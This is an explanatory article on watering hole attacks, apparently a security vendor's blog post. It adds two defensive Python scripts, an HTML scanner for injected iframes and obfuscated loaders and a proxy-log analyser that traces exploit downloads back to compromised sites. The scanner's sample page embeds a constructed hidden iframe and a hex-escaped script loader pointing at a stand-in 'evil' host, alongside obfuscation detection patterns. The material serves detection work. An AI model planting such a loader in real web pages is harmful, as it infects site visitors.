A Watering Hole attack is a method in which the attacker seeks to compromise a specific group of end users by infecting websites that members of that group are known to visit. The technique has been adopted by criminals, APT groups and nation states alike, and the number of reported cases is rising. The goal is to infect a victim's computer and, through it, gain access to the network of the victim's employer. Watering Hole attacks are often described as an alternative to Spear Phishing, but the two are quite different: a Watering Hole attack is still a targeted attack, yet it casts a wider net and typically traps more victims than the attacker's original objective requires. Security professionals do not expect it to replace Spear Phishing.

What is a “Watering Hole” Attack?

Phishing is like handing poisoned candy to random people and hoping they eat it; a Watering Hole attack is like poisoning the village water supply and simply waiting for them to drink.

The name is inspired by predators in the wild that wait near watering holes for prey to come to them. In a Watering Hole attack the "predator" (the attacker) lies in wait on websites that are popular with the "prey" (the target) and uses those sites to infect visitors with malware. In other words, rather than luring victims with a Spear Phishing email campaign, the attacker compromises vulnerable sites that serve the targets' common interest and plants code that redirects visitors to, or silently loads content from, an attacker-controlled site hosting the exploit and malware.

The objectives of such an attack include stealing banking credentials, personal information or intellectual property, as well as gaining a foothold in sensitive computer systems. Because the attacker compromises legitimate websites, which are unlikely to appear on any blocklist, and often uses zero-day exploits for which no antivirus signature exists, the success rate of these attacks remains high.

Although Watering Hole attacks are still less common than other methods, they pose a considerable threat because they are difficult to detect. They typically target high-security organizations indirectly: through their employees, business partners and connected vendors, and even through unsecured wireless networks at conventions.


Who Has Been Affected by Watering Hole Attacks?

Reported victims of this attack method include employees of Facebook, Apple and Twitter whose machines were infected through malware served by a compromised iOS mobile developer forum. They are not the only ones: regional banks, activist groups, government foreign-policy resource sites, manufacturers, defense organizations and companies in many other industries have been hit as well. The Watering Hole method has been used on and off in recent years and dates back to 2009.


How does a Watering Hole attack work?

(Diagram: the stages of a Watering Hole attack)


  1. First, the attackers profile their targets by industry, job title and so on. This tells them which websites the employees or members of the targeted organization visit regularly.
  2. The attacker then looks for vulnerabilities in those websites and injects malicious code, typically a hidden iframe or an obfuscated script, that sends visitors to a separate attacker-controlled site where the exploit and malware are hosted.
  3. The exploit, usually aimed at the browser or one of its plugins, drops the malware onto the target's system.
  4. The attacker now uses the dropped malware to begin its malicious activity, starting with control of the infected machine.
  5. Once the victim's machine is compromised, the attacker moves laterally within the victim's network and ultimately exfiltrates data.
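The injection in step 2 is usually a hidden iframe or an obfuscated inline script that pulls the exploit from an attacker-controlled host. The following Python script, added here as an example and not part of the original article, scans a fetched page for exactly those markers: script, iframe, embed or object sources on origins outside an allowlist, iframes sized or styled to be invisible, and inline script that unpacks an encoded payload at runtime. The sample HTML, the hostnames and the allowlist are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample for this example: a legitimate forum page that has had a
# hidden off-origin iframe and an obfuscated inline loader appended to it.
# The hostnames are placeholders, not real sites.
SAMPLE_HTML = r"""<html><head><title>Embedded Developers Forum</title>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/jquery.min.js"></script>
</head><body>
<h1>Latest threads</h1>
<p>Welcome back.</p>
<iframe src="//cdn-stat1c.example.net/counter.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>var _0x1f=["\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c"];document.write(unescape("%3Cscript%20src%3D%22"+_0x1f[0]+"%22%3E%3C/script%3E"));</script>
</body></html>"""

# Inline-script idioms typical of injected loaders (runtime unpacking of an
# encoded payload). The key is reported whenever its pattern matches.
OBFUSCATION_PATTERNS = {
    "eval_of_decoded_string": re.compile(r"\beval\s*\(\s*(unescape|atob|String\.fromCharCode)\b", re.I),
    "document_write_unescape": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "long_hex_escape_run": re.compile(r"(\\x[0-9a-f]{2}){8,}", re.I),
    "unicode_escape_blob": re.compile(r"(%u[0-9a-f]{4}){4,}", re.I),
}


def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


class LoaderScanner(HTMLParser):
    """Collects findings about resources a page loads from other origins."""

    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_host = urlparse(page_url).hostname
        self.allowed = set(allowed_hosts) | {self.page_host}
        self.findings = []
        self._script_buf = None  # list while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe", "embed", "object"):
            src = a.get("src") or a.get("data")
            # Relative URLs have no hostname and stay on the page's own origin.
            host = urlparse(src).hostname if src else None
            if host and host not in self.allowed:
                self.findings.append(("off_origin_src", tag, host))
        if tag == "iframe":
            style = (a.get("style") or "").lower().replace(" ", "")
            if (_tiny(a.get("width")) or _tiny(a.get("height"))
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(("hidden_iframe", tag, a.get("src")))
        if tag == "script" and not a.get("src"):
            self._script_buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies raw (no entity decoding).
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf)
            self._script_buf = None
            hits = [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(body)]
            if hits:
                self.findings.append(("obfuscated_inline_script", tag, hits))


def scan_page(html, page_url, allowed_hosts=()):
    """Return a list of (finding, tag, detail) tuples for one fetched page."""
    scanner = LoaderScanner(page_url, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML, "https://forum.example.com/index.php", ["cdn.example.org"]):
        print(finding)
```

On the sample page this reports the off-origin iframe host, the 1x1 hidden iframe and the inline loader (matched on `document.write(unescape(` and the run of `\x` escapes). An allowlist of the CDNs a site legitimately uses keeps the first check quiet; anything else that appears between two crawls of the same page deserves a look.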

What can I do to prevent these attacks?

  • Test your current security controls to verify that they protect users browsing the internet from inside the organization: that malware and rootkits cannot be downloaded onto corporate machines and that known infected websites cannot be reached.
  • Add further layers of advanced threat protection, such as behavioral analysis, which stand a far better chance of catching zero-day threats than signature-based tools alone.
  • Keep systems current with the latest software and OS patches offered by vendors, browsers and their plugins included.
  • Treat all third-party traffic as untrusted until it has been verified. It should not matter whether content comes from a partner site or from a popular Internet property such as a Google domain.
  • Use a web gateway solution and test your outbound HTTP/HTTPS exposure to malicious or compromised websites.
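The last bullet is about outbound exposure, and the best place to see a Watering Hole attack from the defender's side is the gateway or proxy log. Assuming a log with one request per line (timestamp, client, method, URL, status, response content type, Referer), the following Python, added here as an example and not Cymulate's own tooling, looks for the transition from step 2 to step 3 in the traffic: a download of executable content from a host the organization has never seen before, whose Referer chain leads back to a site on the organization's normal baseline. The log lines, the baseline and the hostnames are constructed for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed proxy log for this example. Columns: timestamp, client, method,
# URL, status, response content type, Referer ("-" when absent). Client 10.1.2.3
# visits a legitimate forum that has been compromised, is bounced to a host the
# organisation has never seen, and fetches a JAR and an EXE from it; the other
# clients show ordinary traffic. All hostnames are placeholders.
SAMPLE_PROXY_LOG = """\
2023-03-01T09:00:01Z 10.1.2.3 GET https://forum.example.com/index.php 200 text/html -
2023-03-01T09:00:02Z 10.1.2.3 GET https://cdn.example.org/jquery.min.js 200 application/javascript https://forum.example.com/index.php
2023-03-01T09:00:02Z 10.1.2.3 GET https://cdn-stat1c.example.net/counter.php 200 text/html https://forum.example.com/index.php
2023-03-01T09:00:03Z 10.1.2.3 GET https://cdn-stat1c.example.net/lib/jre.jar 200 application/java-archive https://cdn-stat1c.example.net/counter.php
2023-03-01T09:00:09Z 10.1.2.3 GET https://cdn-stat1c.example.net/upd/x.exe 200 application/x-msdownload https://cdn-stat1c.example.net/counter.php
2023-03-01T09:05:00Z 10.1.2.4 GET https://forum.example.com/thread/42 200 text/html -
2023-03-01T09:05:01Z 10.1.2.4 GET https://cdn.example.org/jquery.min.js 200 application/javascript https://forum.example.com/thread/42
2023-03-01T09:30:00Z 10.1.2.5 GET https://updates.example.com/agent.msi 200 application/octet-stream -
"""

# Hosts the organisation has contacted routinely over a trailing baseline
# window. Constructed here; in practice derive it from your own log history.
BASELINE_DOMAINS = {"forum.example.com", "cdn.example.org", "updates.example.com"}

# Response types that execute on the client and are the usual exploit-kit drops.
ACTIVE_CONTENT = {
    "application/java-archive", "application/x-shockwave-flash",
    "application/x-msdownload", "application/octet-stream", "application/pdf",
}


@dataclass
class Event:
    ts: str
    client: str
    method: str
    url: str
    status: str
    ctype: str
    referer: str


def parse_log(text):
    """Parse the space-separated log format described above."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(Event(*line.split()))
    return events


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def find_watering_hole_chains(events, baseline, max_depth=5):
    """Flag active-content downloads from non-baseline hosts whose Referer chain,
    followed back through the same client's earlier requests, reaches a baseline
    host. Returns one alert dict per flagged download."""
    alerts = []
    seen = defaultdict(dict)  # client -> {url: most recent Event for that URL}
    for e in sorted(events, key=lambda x: x.ts):
        if e.ctype.lower() in ACTIVE_CONTENT and host_of(e.url) not in baseline:
            ref, depth, chain = e.referer, 0, []
            while ref not in ("-", "") and depth < max_depth:
                chain.append(ref)
                if host_of(ref) in baseline:
                    alerts.append({
                        "client": e.client,
                        "payload_url": e.url,
                        "payload_host": host_of(e.url),
                        "watering_hole": host_of(ref),
                        "chain": chain,
                    })
                    break
                prev = seen[e.client].get(ref)
                ref = prev.referer if prev else "-"
                depth += 1
        seen[e.client][e.url] = e
    return alerts


if __name__ == "__main__":
    for alert in find_watering_hole_chains(parse_log(SAMPLE_PROXY_LOG), BASELINE_DOMAINS):
        print(alert)
```

On the sample log this raises two alerts for 10.1.2.3, both pointing at forum.example.com as the watering hole and cdn-stat1c.example.net as the payload host, while the other clients' traffic is silent. On real logs the baseline should cover a few weeks of history, and the content-type filter is a deliberate narrowing for the example: a never-seen host reached by redirect from a trusted site is worth a look even before it serves anything executable.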


This kind of attack is sure to continue as attackers keep leveraging legitimate resources as a springboard: influencing search engine results, posting on popular social networks and hosting malware on trusted file-sharing sites.

Request Cymulate's free Web Gateway Assessment to see your organization's outbound exposure to malicious or compromised websites.